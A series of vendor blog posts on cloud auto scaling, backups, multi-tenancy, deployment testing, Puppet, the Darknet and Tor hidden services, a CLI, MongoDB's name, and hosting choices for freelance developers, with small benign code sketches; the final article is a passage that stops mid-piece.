
Cloud Services’ Greatest Hits: Auto Scaling, and Automatic Backups


Two of the most compelling reasons to switch from in-house to cloud-based services are the efficiency of auto scaling and the security of automatic backups.

If you believed everything you read, you’d think the cloud would single-handedly save the world and everything in it. When you cut through the hyperbole and look solely at results, you find that two of cloud services’ traditional strengths remain the key to their success: first, the ability to scale compute, network, and storage resources dynamically and automatically; and second, the security benefit of automatic backups that can be stored safely apart from potential threats, whether natural disasters or the human-made variety.

Nobody could be blamed for thinking the “(fill-in-the-blank) as a service” hype has gotten way out of hand. Now that “everything as a service” and “anything as a service” have arrived, you would think the as-a-service possibilities had run their course.

But no. Recent permutations include education-as-a-service (which shares an acronym with email-as-a-service), delivery-as-a-service, and food-and-groceries-as-a-service. Can dog-grooming-as-a-service be far behind? (Don’t tell me – it’s already been done… somewhere.)

One more as-a-service pitch and your local IT manager is likely to drop a rack of idle servers on your head. It’s time to cut through the chatter and get to the heart of cloud-service advantages: more efficient use of your hardware, software, and human resources. The two cloud features that deliver the greatest efficiency bump for most organizations are auto-scaling and automatic backups.

Accommodate changes in resource demand without over-provisioning

If only auto-scaling your cloud services were as easy as pressing a big red “Scale” button. Amazon Web Services claims that its CloudWatch metrics let you scale EC2 instances dynamically, or if you prefer, you can set your own schedule for resource-demand peaks and valleys. In practice, however, AWS’s Auto Scaling sometimes fails to live up to its billing. In a September 2015 article, TechTarget’s Chris Moyer describes a situation in which AWS servers were still running, even though their services had stopped and would not restart.

AWS Auto Scaling works in conjunction with an elastic load balancer and the CloudWatch service to match resources to workloads, but some stopped services may not be detected on running servers. Source: Harish Ganesan, via Slideshare

Once the server stopped serving up requests, the Elastic Load Balancer (ELB) would disconnect from it. However, the AWS Auto Scaling group wouldn’t replace the server because it was still running. When the service ultimately stopped because all the servers were affected, Auto Scaling didn’t detect the failure, so it never sent an alert that the service had failed and would not restart. The glitch could have been avoided if ELB health checks had been used in addition to EC2’s own health checks.

In Moyer’s case, a problem with the Auto Scaling group configuration was causing a server to be killed and relaunched continuously: every 5 minutes a new server was launched and an old one was terminated. Since the minimum billing time for each AWS instance is one hour, the constant stopping and starting was increasing the tab by a factor of 12. (Once the discrepancy was discovered and the problem fixed, Amazon credited the resulting overcharge, as well as similar overpayments in the two previous months.)

To prevent such constant relaunches, Moyer recommends subscribing to notifications on Auto Scaling groups. When you find that AWS is spinning up and replacing servers unnecessarily, either disable an availability zone or stop the group from executing any actions. You also have to make sure ELB is giving servers a sufficient grace period before deciding the server isn’t starting correctly.
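
For illustration only, here is a minimal boto3 sketch (not Moyer’s code) of the safeguards described above: an Auto Scaling group that uses ELB health checks in addition to EC2 status checks, a generous grace period, and notifications on every launch and termination. The group name, launch configuration, load balancer, subnet ID, and SNS topic ARN are all placeholders.

# Sketch: an Auto Scaling group that trusts the load balancer's view of health,
# waits for instances to boot before judging them, and reports every scaling event.
import boto3

autoscaling = boto3.client("autoscaling", region_name="us-east-1")

autoscaling.create_auto_scaling_group(
    AutoScalingGroupName="web-asg",
    LaunchConfigurationName="web-launch-config",
    MinSize=2,
    MaxSize=6,
    LoadBalancerNames=["web-elb"],
    HealthCheckType="ELB",        # replace instances the ELB marks unhealthy,
                                  # not only those failing EC2 status checks
    HealthCheckGracePeriod=300,   # give new servers time to start before checks count
    VPCZoneIdentifier="subnet-0123456789abcdef0",
)

# Subscribe the group to notifications so you hear about every launch/terminate cycle.
autoscaling.put_notification_configuration(
    AutoScalingGroupName="web-asg",
    TopicARN="arn:aws:sns:us-east-1:123456789012:asg-events",
    NotificationTypes=[
        "autoscaling:EC2_INSTANCE_LAUNCH",
        "autoscaling:EC2_INSTANCE_TERMINATE",
    ],
)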

Morpheus' app and DB management service makes it easy to avoid having your auto-scaling operations run amok. For example, Morpheus’s Instance Summary Panel shows three types of status graphs: Memory (cache, used, and max), Storage (used and max), and CPU (system and user). The server summary also lists all containers, including the name, location, type, IP address, port, memory, storage, and status of each. You can instantly stop, start, or restart an instance via the panel’s drop-down menu.

Automatic backups ensure you’re prepared for any data calamity

You never know what hazard will be the next to threaten your organization’s most important data. In a November 15, 2015, article, security expert Brian Krebs reports on the latest iteration of ransomware that targets websites hosted on Linux servers. In April 2015, Check Point identified the vulnerability in the Magento shopping-cart software that the virus writers exploited, and a patch was released soon thereafter. However, many ecommerce sites remain unpatched and continue to be victimized by the ransomware, according to Krebs.

The best defense against ransomware and other data risks is to back up all critical data automatically to a secure cloud-backup service. As IT Pro’s Davey Winder reports in a November 17, 2015, article, the FBI took much heat when the agency recommended that victims of ransomware simply pay the ransom. While that may free your hostage data in the short term, it empowers and emboldens the cybercriminals to target even more of your sensitive data – and to demand higher payoffs to liberate it. Of course, there’s always the risk that the crooks will take the money and run – without releasing your data.

Winder is one of several security analysts who recommend strongly that you never pay ransom for your hostage data. It’s safer, cheaper, and more socially responsible to simply restore your data from your near-real-time backup. The standard advice is to have both local and cloud backups, but the key is to have at least one current backup of all important data that is “air-gapped,” meaning it has no connection – wired or wireless – to the computers and networks that are at risk of infection by ransomware.

The CryptoWall ransomware continues to infect systems around the world. As of late 2014 the virus had infected more than a quarter million systems in the U.S. alone. Source: Dell SecureWorks

Cloud backups of your critical apps and databases don’t get simpler, safer, or more efficient than those you create automatically via the Morpheus service. Morpheus not only collects system, application, and database logs automatically for all provisioned systems; it also backs up each new app or database stack component automatically. You can define the frequency of your backups, as well as set the destination (local or cloud), without having to write custom cron jobs.

Cloud management services such as Morpheus are increasing in popularity for a very good reason, or rather for three very good reasons: efficiency (resource consumption increases and decreases as your needs dictate); availability (access your apps and data from any location); and security (protect your valuable data assets from natural and human-made threats). That’s a prospect IT managers are finding more and more difficult to ignore.


To see what Morpheus can do for you, click here to sign up for a FREE 30-day trial.


Cloud Multi-Tenancy Finds the Right Mix of Security and Scalability


By offering enhanced security as well as efficient scalability, multi-tenancy has become the cloud’s most important attribute.

Once perceived as the weak link in the cloud-security chain, multi-tenancy has evolved to become not only the foundation of the efficiencies the cloud is noted for, but also the key to keeping your organization’s valuable applications and data secure. By sharing a single codebase, cloud apps and data can be patched and updated much faster than is possible when they reside in your company’s internal networks.

Multi-tenancy is a cornerstone of cloud computing. It is the key to the cloud’s elastic scalability and other cost efficiencies. But when it comes to multi-tenancy’s data-management benefits, on-demand scalability is the tip of the iceberg. In particular, organizations of all sizes are coming to appreciate the enhanced security of the multi-tenant architecture, particularly when compared to the increasing difficulty of securing in-house data centers.

Ironically, security was often cited as a weakness of multi-tenancy in the early days of cloud computing. It didn’t take long for that perception to do a 180. As Forbes’ Tom Groenfeldt reports in a December 1, 2015, article, IT departments tend to overestimate their ability to secure their in-house networks.

Groenfeldt cites a recent report that found in-house breaches can take weeks or months to discover and patch, whereas cloud services have up-to-date tools and qualified staff to detect and correct security vulnerabilities before they can be exploited. In fact, near-constant security auditing is often a requirement for cloud services to earn the certification their infrastructures require, according to Groenfeldt.

Multi-tenancy distinguishes true cloud services from mere ‘hosted’ apps

Multi-tenancy is also a feature that distinguishes cloud services from the data-hosting offerings of third parties that merely move the customer’s apps and databases from a server in their data center to an identical server at the service provider’s site. This practice is referred to as “cloud washing” by DataInformed’s Bil Harmer in a November 30, 2015, article. Harmer states that multi-tenancy is a fundamental aspect of the three major cloud categories: infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS).

All three major cloud categories rely on multi-tenancy to deliver the elastic scalability that is the cornerstone of cloud-service efficiency. Source: Forrester Research

Harmer identifies three must-have features of true multi-tenancy:

  1. Multiple customers, or tenants, use the same application or set of applications
  2. All the tenants share the same architecture
  3. Each tenant’s instances are completely separate from those of all other tenants

When a vendor simply runs its legacy software in multiple virtual machines, it is merely hosting those isolated apps, not delivering cloud applications, according to Harmer. If the vendor claims to be offering a multi-tenant environment for such hosted apps, it is cloud washing. Not that there’s anything wrong with app-hosting services. It’s just not appropriate to market such products as cloud-based.

The primary difference is that when you need more capacity in a hosted service, the vendor will issue a Statement of Work (SoW) that states explicitly what resources you are contracting for: hardware, installation, maintenance, licensing, and support. By contrast, a cloud service scales capacity on demand, and because all tenants share a single codebase, everyone benefits automatically when that codebase is patched or upgraded, without requiring any renegotiation.

How multi-tenancy balances sharing with security

Back in 2011, Oracle CEO Larry Ellison told the Oracle Open World conference that his company’s “cloud” solution was more secure than that of rival Salesforce.com because Oracle’s service did not use multi-tenancy, while Salesforce.com’s offering did. As Forrester Research’s James Staten and John R. Rymer point out in the definitive whitepaper Understanding Cloud’s Multitenancy (pdf), Ellison was wrong on two counts:

  1. In fact, both Oracle and Salesforce.com provide multi-tenant solutions, although the two services use different architectures to balance economies of scale with security.
  2. Likewise, both companies’ cloud services are secure when properly configured, ensuring that each tenant is autonomous while all tenants receive an equally consistent experience, performance, and reliability from shared resources.

Tenant autonomy is achieved by isolating tenants at three points in the cloud architecture:

  1. By restricting access to the cloud service itself, often by limiting the network addresses from which a tenant is allowed to submit requests
  2. By restricting access to individual apps and resources, using either the dedicated resource model or the metadata map model
  3. By restricting access to the data, typically by dedicating a database to each tenant, again using either the dedicated resource model or metadata map model.

The two principal methods used by cloud services to ensure tenant autonomy in multi-tenant architectures are the dedicated resource model and the metadata map model. Source: Forrester Research 

The primary difference between the two models is that the former provides each customer with a fixed set of logical resources that are clearly defined, packaged, priced, and allocated; while the latter “hides” all processor, storage, and network resources behind metadata and keeps the metadata separate from the data and resources. The dedicated resource approach is more akin to traditional enterprise infrastructure management, while the metadata map model assigns objects to each tenant for all operational tasks as if they were organized into a container.

In reality, cloud services are likely to use a mix of these two approaches: the dedicated resource model for apps that were written originally for on-premises, single-tenant environments; and the metadata map model for apps and services designed with multi-tenancy in mind from the get-go. The Morpheus cloud application management platform supports both models in public, private, and hybrid cloud environments via its out-of-the-box integration with Amazon Web Services (AWS) and OpenStack. Morpheus offers a single management console that lets you track servers, storage, and utilization in the cloud configuration of your choice.

How to Reduce App Deployment Time — Fast


System changes occur so quickly that upgrades and updates have to be unobtrusive and ready to hit the ground running.

The changing nature of application development necessitates new methods for ensuring updates and patches are deployed in near-real time via automated testing and validation. The challenge is to deploy apps in a way that doesn’t hinder users’ access to your organization’s vital applications. To do so, you have to think small, and you have to be ready to respond to feedback as quickly as you receive it.

It’s almost certain that whatever software components your new application needs have already been written. “Application development” is now a matter of putting pre-existing software pieces together in an intelligent, problem-solving, revenue-generating way, with little or no original coding required. Then all you need is the most efficient combination of compute cycles, storage, network bandwidth, and database elements to support your apps.

What matters as much as development these days is continuous, almost-instantaneous updating, which keeps you in a near-constant state of deployment. The goal is to update in the background, in a way that minimizes interference with users. Two principles make that possible:

  1. Deployments: Small and focused
  2. Testing: Fast and well-defined

The foundation of modern app development is API- and service-based access to functionality: Code and configuration repositories, source code, and configuration versioning and controls are required for rapid, focused, compartmentalized deployment. One key to the success of your app-development project is to involve the “Ops” side of DevOps from the get-go. This way, the operations staff can help define the supportability, testing, management, and security of the services comprising your applications.

Updates will often add new fields, modify forms and reports, customize or enhance dashboards, even add new use cases to expand the potential user base for the application. All of these changes make the app more complex. They also have the potential to conflict with other infrastructure components, and they may hinder performance and usability.

You can’t always know what changes you’ll have to make to the app in the future to keep it up-to-date. You have to develop with flexibility in mind. When you take a no-code, low-code approach to app development, you’re better able to make alterations quickly and precisely, with minimal impact on users.

Streamline testing, but not too much!

Continuous deployment depends on two things: Determining the lowest level of test coverage necessary for each deployment, and choosing automated testing tools that you can trust to do the job. In a November 13, 2015, post on DZone’s DevOps Zone, Moritz Plessnig identifies three principal benefits of continuous deployment:

  1. Small, focused iterations are less likely to cause problems, and they’re also easier to troubleshoot.
  2. Frequent updates maintain momentum and give users a sense of the app progressing.
  3. Users get faster access to new features and can provide feedback more quickly.

Continuous deployment moves changes through the deployment cycle automatically. Source: Yaniv Yehuda, via InfoQ 

Plessnig considers three types of deployment tests to be indispensable:

  1. The smoke test simply confirms that the system functions as it was designed to function. You want to make sure the various components work as expected in the production environment, not just in a simulated testbed.
  2. Happy path story testing ensures that the sequence of actions users typically step through to complete a task operates as expected. Examples are the sign-in process, order entry, and product purchase. You have to test the “happy path” for each of these “user stories,” according to Plessnig. As with smoke tests, the happy path test must use production code and run in a production environment. (A minimal sketch of both test types follows this list.)
  3. Integration testing verifies the application’s boundaries. It can take the place of unit testing, generative testing, mutation testing, and other traditional developer-focused tests. For example, classes and modules may run without a hitch in an isolated test environment but clash when they’re connected to a database, file system, or other external component.
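
Here is a minimal pytest-and-requests sketch of the first two test types. The base URL, routes, and credentials are hypothetical placeholders; point them at your own production (or production-like) environment.

# Sketch: a smoke test and a happy-path test run against a live environment.
import requests

BASE_URL = "https://app.example.com"  # placeholder

def test_smoke_health_endpoint():
    # Smoke test: the deployed service is up and answering requests.
    resp = requests.get(f"{BASE_URL}/health", timeout=5)
    assert resp.status_code == 200

def test_happy_path_sign_in():
    # Happy path: a typical user story (sign-in) completes end to end.
    resp = requests.post(
        f"{BASE_URL}/signin",
        json={"email": "smoke-test@example.com", "password": "not-a-real-password"},
        timeout=5,
    )
    assert resp.status_code == 200
    assert "token" in resp.json()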

Puppet adapts readily to changes in your infrastructure

One of the most popular ways to keep tabs on the configuration of your Linux servers is Puppet, which is available in both open-source and commercial versions. As reported in a November 25, 2015, article in Linux Journal, after you define the state of your IT infrastructure, Puppet enforces that state across OSes; physical, virtual, and cloud environments; network and storage devices; and applications. This includes initial code development, testing, production release, and updates; as well as provisioning of physical and virtual machines, orchestration, and reporting.

In the Puppet workflow, the agent collects information about the host and sends it to the server; the parser compiles an implementation for the host and returns it to the agent; and then the agent applies the configuration locally. Source: Luke Kanies, via Aosabook.org

The new Puppet Application Orchestration App is intended to serve as the single method for updating all of your application’s deployment tiers: from the application layer through all the infrastructure layers it supports. This lets you model distributed applications as Puppet code to take advantage of Puppet’s declarative model-based design. More than 3,500 Puppet modules are available for assembly into full models of distributed applications.


Morpheus helps customers of all sizes reduce application deployment time by more than 2x. To see how Morpheus can help your business, click here to sign up for a free demo.

Darknet Busters: Taking a Bite Out of Cybercrime-as-a-Service


The first step in combatting the perpetrators of Internet crimes is to uncover the Darknet in which they operate.

It's getting easier and easier for criminals to infiltrate your company’s network and help themselves to your financial and other sensitive information, and that of your customers. There's a ready market for stolen certificates that make malware look legitimate to antivirus software and other security systems.

The crooks even place orders for stolen account information: One person is shopping for purloined Xbox, GameStop, iTunes, and Target accounts; another is interested only in accounts belonging to Canadian financial institutions. Each stolen record costs from $4 to $10, on average, and customers must buy at least $100 worth of these hijacked accounts. Many of the transactions specify rubles (hint, hint).

Loucif Kharouni, Senior Threat Researcher for security service Damballa, writes in a September 21, 2015, post that the cybercrime economy is thriving on the so-called Darknet, or Dark Web. Criminals now offer cybercrime-as-a-service, allowing anyone with an evil inclination to order a made-to-order malware attack; no tech experience required.

Criminal sites operate beyond the reach of law enforcement

Sadly, thieves aren't the only criminals profiting from the Darknet. Human traffickers, child pornographers, even murderers are taking advantage of the Internet to commit their heinous crimes, as Dark Reading's Sara Peters reports in a September 16, 2015, article.

Peters cites a report by security firm Bat Blue Networks that claims there are between 200,000 and 400,000 sites on the Darknet. In addition to drug sales and other criminal activities, the sites are home to political dissidents, whistleblowers, and extremists of every description. It's difficult to identify the servers hosting the sites because they are shrouded by virtual private networks and other forms of encryption, according to Bat Blue's researchers.

Most people access the sites using The Onion Router (Tor) anonymizing network. That makes it nearly impossible for law enforcement to identify the criminals operating on the networks, let alone capture and prosecute them. In fact, Bat Blue claims "nation-states" are abetting the criminals, whether knowingly or unknowingly.

The Darknet is populated by everyone from public officials to religious extremists, and for an equally wide range of purposes. Source: Bat Blue Networks

While hundreds of thousands of sites comprise the Darknet, you won’t find them using the web’s Domain Name System. Instead, the sites communicate by delivering an anonymous service, called a “hidden service,” via updates to the Tor network. Rather than getting a domain from a registrar, the sites authenticate each other by using self-generated public/private key pair addresses.

The public key generates a 16-character hash that ends in .onion to serve as the address that accesses the hidden service. When the connection is established, keys are exchanged to create an encrypted communication channel. In a typical scenario, the user installs a Tor client and web server on a laptop, takes the laptop to a public WiFi access point (avoiding the cameras that are prevalent at many such locations), and uses that connection to register with the Tor network.

The Tor Project explains the six-step procedure for using a hidden service to link anonymously and securely via the Tor network:

  1. Party A builds circuits to select introduction points on the Tor network.
  2. A hidden service descriptor containing the public key and summaries of each introduction point, and signed by the private key, is uploaded to a distributed hash table on the network.
  3. Party B finds the hidden service’s .onion address and downloads the descriptor from the distributed hash table to establish the protected connection to it.
  4. Party B creates an “introduce” message encrypted to the hidden service's public key; the message includes the address of the rendezvous point and the one-time secret. The message is sent to one of the introduction points for delivery to the hidden service. (This step is shown in the image below.)
  5. The hidden service decrypts the message, finds the rendezvous address and one-time secret, creates a circuit to the rendezvous point, and sends a rendezvous message that contains another one-time secret.
  6. The rendezvous point notifies Party B that the connection has been established, and then Party B and the hidden service pass protected messages back and forth.

In the fourth of the six steps required to establish a protected connection to the Tor network, Party B (Ann) sends an “introduce” message to one of the hidden service’s introduction points created by Party A (Bob). Source: Tor Project

Defeating the Darknet starts by removing its cloak of invisibility

Criminals cannot be allowed to operate unfettered in the dark shadows of the Internet. But you can’t arrest what you can’t spot. That’s why the first step in combatting Darknet crime is to shine a light on it. That’s one of the primary goals of the U.S. Defense Advanced Research Projects Agency’s Memex program, which Mark Stockley describes in a February 16, 2015, post on the Sophos Naked Security site.

Memex is intended to support domain-specific searches, as opposed to the broad, general scope of commercial search engines such as Google and Bing. Initially, it targets human trafficking and slavery, but its potential uses extend to the business realm, as Computerworld’s Katherine Noyes reports in a February 13, 2015, article.

For example, a company could use Memex to spot fraud attempts and vet potential partners. However, the ability to search for information that isn’t indexed by Google and other commercial search engines presents companies with a tremendous competitive advantage, according to analysts. After all, knowledge is power, and not just for the crooks running amok on the Darknet.

Using a CLI for App Development and Deployment


Find out how a CLI can help your company with app development and deployment 

A CLI can help developers and administrators get apps deployed quickly, in addition to its other uses, such as automating operating-system tasks or running commands to ping a host, get information on files, or execute file-system operations.

What is a CLI?

CLI stands for command-line interface, though you might also hear of this under a different name or acronym, such as character user interface (CUI) or command-line user interface. A CLI allows a user to issue commands to a program using written text rather than a GUI (Graphical User Interface). For many years, CLIs were the main form of interacting with computers. The introduction of GUI operating systems such as Windows and Macintosh eventually made computer operation easier for beginners, but CLIs have remained an alternative means of interaction, often employed by more advanced users such as administrators or developers.

 

Source: HubPages 

How do CLIs help Administrators and Developers?

For administrators and developers, a CLI can be a handy tool for interacting with a particular piece of software. Whether it is an operating system, a server, or another system, a CLI gives you the ability to pass additional parameters to the commands you need to run. This sort of flexibility helps when you need to configure a command to run a particular way. For example, getting a directory listing in a CLI for Windows is done by typing “dir” and pressing “Enter”. This works well for short listings, but if a directory contains a large number of files, you may not be able to see what you need on the screen. To help with this, you can add the “/p” parameter, e.g., “dir /p”. This time, the CLI displays only as many files as fit on a single screen and lets you page through the rest until you find what you need.

SaaS with a CLI

As an administrator or developer, you may be considering a SaaS package, and having a CLI to work with would be helpful. Morpheus is a service that offers exactly that: SaaS with a CLI to boost your productivity. With the Morpheus CLI, you can quickly provision instances by typing in the necessary commands. For example, the interaction below creates a Node.js instance on Morpheus with ease:

 $ morpheus instances add "My node app" node

Configurations:

  1) Single Node (node-4.0.0-single)

Selection: 1

Select a Plan:

  1) Memory: 128MB Storage: 1GB

  2) Memory: 256MB Storage: 3GB

  3) Memory: 512MB Storage: 5GB

  4) Memory: 1GB Storage: 10GB

  5) Memory: 2GB Storage: 20GB

  6) Memory: 4GB Storage: 40GB

  7) Memory: 8GB Storage: 80GB

  8) Memory: 16GB Storage: 160GB

Selection: 1

With Morpheus, you can provision apps and databases in real-time to public, private, and hybrid clouds and spin up databases, apps, environments and more with a few simple clicks. You can use the monitoring service to keep track of overall app uptime and response time, while also tracking the vital statistics for each individual piece of your app. With all of these features, why not give Morpheus a try today? Click here to sign up for a demo now. 

How Did MongoDB Get Its Name?


Curious how MongoDB got its name? Here's your quick history lesson for the day. 

Example of a MongoDB query. Source: MongoDB.

The company behind MongoDB

MongoDB was originally developed by MongoDB, Inc., which at the time (2007) was named 10gen. The company was founded by former DoubleClick founders and engineers, specifically Dwight Merriman, Kevin P. Ryan, and Eliot Horowitz.

At first, 10gen wanted to build an open-source platform as a service. The company wanted all of the components of its software to be completely open source, but could not find a database that met its needs and provided the type of scalability required for the applications being built.

The platform 10gen was working on was named Babble and was going to be similar to the Google App Engine. As it turned out, there wasn’t a big market for Babble, but both users and non-users of Babble agreed that the database 10gen had created to accompany the platform was excellent and said they would be happy to use it on its own.

While originally simply dubbed "p", the database was officially named MongoDB, with "Mongo" being short for the word humongous. Given the input 10gen had received about MongoDB, the company decided it would indeed be best to scrap the Babble project and release MongoDB on its own as an open-source database platform in 2009.

By 2012, 10gen had been named number nine on “The Next Big Thing 2012” list published by the Wall Street Journal and had six offices located in various parts of the world. In 2013, 10gen renamed itself MongoDB, Inc. to strengthen the association with its popular primary product.

The impact of MongoDB

As time went on, MongoDB moved up the ranks to become the most popular document-store database, and the fourth most popular database system overall. It is used by highly successful companies such as eBay, Adobe, LinkedIn, Foursquare, McAfee, Shutterfly, and others.

It is also used by software developers as part of the MEAN stack, which includes MongoDB (database), Express (web app framework), AngularJS (MVC JavaScript front-end framework) and NodeJS (platform for server-side apps). Part of the popularity of this stack is that JavaScript and/or JSON/BSON notation can be used across all members of the stack, allowing developers to easily move through and develop within each piece of the stack.
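
To see why the document model travels so well across a stack, here is a minimal pymongo sketch (Python rather than JavaScript, purely for illustration). The connection string, database, and collection names are placeholders.

# Sketch: storing and querying a JSON-style document in MongoDB.
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")  # placeholder connection string
db = client["demo_app"]

# Documents are schemaless JSON/BSON, so nested structures map naturally
# to the objects an application already works with.
db.users.insert_one({
    "name": "Ada",
    "roles": ["admin", "editor"],
    "profile": {"city": "London", "joined": 2015},
})

# Query by a nested field without joins or schema migrations.
print(db.users.find_one({"profile.city": "London"}))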

The MEAN stack. Source: modernweb.

All in all, MongoDB can be an excellent choice for a database for your applications, especially if you deal with large amounts of data that will continually expand over time!


To see how Morpheus can help you get more out of your MongoDB, sign up for a demo today!

Hosting For Freelance Developers: PaaS, VPS, Cloud, And More


By Nermin Hajdarbegovic, Technical Editor at Toptal

At a glance, the hosting industry may not appear exciting, but it's grunts in data centres the world over that keep our industry going. They are, quite literally, the backbone of the Internet, and as such they make everything possible: from e-commerce sites to smart mobile apps for our latest toys. The heavy lifting is done in boring data centres, not on our flashy smartphones and wafer-thin notebooks.

Whether you’re creating a virtual storefront, deploying an app, or simply doing some third-party testing and development, chances are you need some server muscle. The good news is that there is a lot to choose from. The hosting industry may not be loud or exciting, but it never sleeps; it’s a dog eat dog world, with cutthroat pricing, a lot of innovation behind the scenes, and cyclical hardware updates. Cloud, IaaS and PaaS have changed the way many developers and businesses operate, and these are relatively recent innovations.

In this post I will look at some hosting basics from the perspective of a freelance developer: what to choose and what to stay away from. Why did I underline freelance software engineers? Well, because many need their own dev environment, while at the same time working with various clients. Unfortunately, this also means that they usually have no say when it comes to deployment. For example, it’s the client’s decision how and where a particular web app will be hosted, and a freelancer hired on short-term basis usually has no say in the decision. This is a management issue, so I will not address it in this post other than to say that even freelancers need to be aware of options out there. Their hands may be tied, but in some cases clients will ask for their input and software engineers should help them make an informed decision. Earlier this week, we covered one way of blurring the line between development and operations: DevOps. In case you missed that post, I urge you to check it out and see why DevOps integration can have an impact on hosting as well.

Luckily, the hosting industry tries to cater to dev demand, so many hosting companies offer plans tailored for developers. But wait, aren’t all webhosting plans just as good for developers as these “developer” plans? Is this just clever marketing and a cheap SEO trick?

Filtering Out the Noise 

So, how does one go about finding the right hosting plan? Google is the obvious place to start, so I tried searching for “hosting for developers.” By now, you can probably see where I am going with this. That particular search yielded 85 million results and enough ads to make Google shareholders pop open a bottle of champagne.


If you’re a software engineer looking for good hosting, it’s not a good idea to google for answers. Here’s why.

There is a very good reason for this, and I reached out to some hosting specialists to get a better idea of what goes on behind the scenes.

Adam Wood, Web Hosting Expert and Author of Ultimate Guide to Web Hosting explained: 

“Stay away from Googling ‘hosting for developers.’ That shows you hosts that have spent a lot of money on SEO, not a lot of energy on building an excellent platform.” 

Wood confirmed what most of us knew already: A lot of “hosting for developers” plans are marketing gimmicks. However, he stressed that they often offer perfectly fine hosting plans in their own right.

“The ‘hosting’ is real, the ‘for developers’ part is just marketing,” he added.

Although Wood works for hosting review site WhoIsHostingThis, he believes developers searching for a new host should rely on more than online searches.

Instead of resorting to Google, your best bet for finding the perfect plan for your dev needs is word of mouth and old-fashioned research:

  • Check out major tech blogs from developers using the same stack as you.
  • Reach out to the community and ask for advice.
  • Take a closer look at hosting plans offered by your current host. Look for rapid deployment tools, integration with other developer tools, testing support and so on.
  • Make sure you have clear needs and priorities; there’s no room for ambiguity.
  • Base your decision on up-to-date information.

Small Hosts May Have Trouble Keeping Up

But what about the hundreds of thousands of hosting plans tailored for developers? Well, they’re really not special and in most cases you can get a similar level of service and support on a “plain Jane” hosting plan.

Is there even a need for these small and inexpensive plans? Yes, there is. Although seasoned veterans probably won’t use them, they are still a piece of the puzzle, allowing small developers, hobbyists and students to hone their skills on the cheap, using shared hosting plans that cost less than a gym membership. Nobody is going to host a few local hobby sites on AWS, and kids designing their first WordPress sites won’t get a VPS. In most cases, they will use the cheapest option out there.

Cheap, shared hosting plans are the bread and butter of many hosting outfits, so you can get one from an industry leader, or a tiny, regional host. The trouble with small hosts is that most of them rely on conventional reseller hosting or re-packaging cloud hosting from AWS and other cloud giants. These plans are then marketed as shared hosting plans, VPS plans, or reseller plans.

Bottom line: If something goes wrong with your small reseller plan, who are you going to call in the middle of the night?

Small hosts are fading, and this is more or less an irreversible trend. Data centres are insanely capital-intensive; they’re the Internet equivalent of power stations, and they keep getting bigger and more efficient while competing to offer lower pricing and superior service. This obviously involves a lot of investment: huge facilities with excellent on-site security and support, air-conditioning, redundant power supplies and amazingly expensive Internet infrastructure. On top of that, hosts need a steady stream of cutting-edge hardware. Flagship Xeons and SAS SSDs don’t come cheap.

There is simply no room for small players in the data centre game.

Small resellers still have a role to play, usually by offering niche services or localisation, including local support in languages the big hosts don’t cover. However, most of these niches and potential advantages don’t mean a whole lot for the average developer.

The PaaS Revolution

Less than a decade ago, the industry revolved around dedicated and shared hosting, and I don’t think I need to explain what they are and how they work.

Cloud services entered the fray a few years ago, offering unprecedented reliability and scalability. The latest industry trends offer a number of exciting possibilities for developers in the form of developer-centric Platform-as-a-Service (PaaS) offerings.


PaaS is the new black for many developers. How does it compare to traditional hosting?

Most developers are already familiar with big PaaS services like Heroku, Pantheon, and OpenShift. Many of these providers began life as platforms for a specific framework or application. For example, Heroku was a Ruby-on-Rails host, while Pantheon was a Drupal managed-hosting provider, which expanded to WordPress.

PaaS services can be viewed as the next logical step in the evolution of managed hosting. However, unlike managed hosting, PaaS is geared almost exclusively toward developers. This means PaaS services are tailored to meet the needs of individual developers and teams. It’s not simply about hosting; PaaS is all about integrating into a team’s preferred workflow by incorporating a number of features designed to boost productivity. PaaS providers usually offer a host of useful features:

  • Ability to work with other developer tools like GitHub.
  • Supports Continuous Integration (CI) tools like Drone.io, Jenkins, and Travis CI.
  • Allows the creation of multiple, clonable environments for development, testing, beta, and production.
  • Supports various automated testing suites.

Best of all, many PaaS providers offer free developer accounts. Heroku and Pantheon both allow developers to sample the platform, thus encouraging them to use it for projects later on. In addition, if one of these experimental projects takes off, developers are likely to remain on the platform. 

It’s clever marketing, and it’s also an offer a lot of developers can’t afford to ignore. PaaS is here to stay and if you haven’t taken the plunge yet, perhaps it is time to do a little research and see what’s out there.

Traditional Hosting And Cloud Offerings

Dedicated and shared hosting aren’t going anywhere. They were the mainstays of web hosting for two decades and they’re still going strong. A lot of businesses rely on dedicated servers or VPS servers for their everyday operations. Some businesses choose to use cloud or PaaS for specific tasks, alongside their existing server infrastructure.

In some situations, PaaS can prove prohibitively expensive, but powerful dedicated servers don’t come cheap, either. The good news is that PaaS can give you a good idea of the sort of resources you will need before you decide to move to a dedicated server. Further, PaaS services tend to offer better support than managed VPS servers or dedicated servers.

Of course, all this is subjective and depends on your requirements and budget.


PaaS, dedicated servers, VPS plans, or your own slice of the Cloud. What should a freelance software engineer choose?

Call me old-fashioned, but I still believe dedicated servers are the best way of hosting most stuff. However, this only applies to mature projects; development is a whole other ball game. Managed dedicated servers offer exceptional reliability and good levels of support, along with good value for money.

Properly used, dedicated servers and PaaS can speed up deployment as well, as Adam Wood explains:

“I can spin up a new Ruby-on-Rails app on Heroku in a matter of minutes. Doing the same thing on AWS takes me half a day, and I constantly feel like I’m about to break something.”

Cloud services are inherently more efficient than dedicated hardware because you only use the resources you need at any given time. For example, if you are operating a service that gets most of its traffic during office hours (from users in the Americas), your dedicated server will be underutilised for 12 to 16 hours. Despite this obvious efficiency gap, dedicated servers can still end up cheaper than cloud solutions. In addition, customers can customise and upgrade them the way they see fit.

Cloud is catching up, but dedicated servers will still be around for years to come. They’re obviously not a good solution for individual developers, but are for a lot of businesses. VPS plans cost a lot less than dedicated servers and are easily within the reach of individual developers, even though they don’t offer the same level of freedom as dedicated servers.

What Does This Mean For Freelancers?

The good news is that most freelance software engineers don’t need to worry about every hosting option out there. While it’s true that different clients have different ways of doing things, in most cases it’s the client’s problem rather than yours.

This does not mean that different hosting choices have no implications for freelancers; they do, but they are limited. It is always a good idea to familiarise yourself with the infrastructure before getting on board a project, but there is not much to worry about. Most new hosting services were developed to make developers’ lives easier and keep them focused on their side of the project. One of the positive side-effects of PaaS and cloud adoption is increasing standardisation; most stacks are mature and enjoy wide adoption, so there’s not a lot that can go wrong.

Besides, you can’t do anything about the client’s choice of infrastructure, for better or for worse. But what about your own server environment?

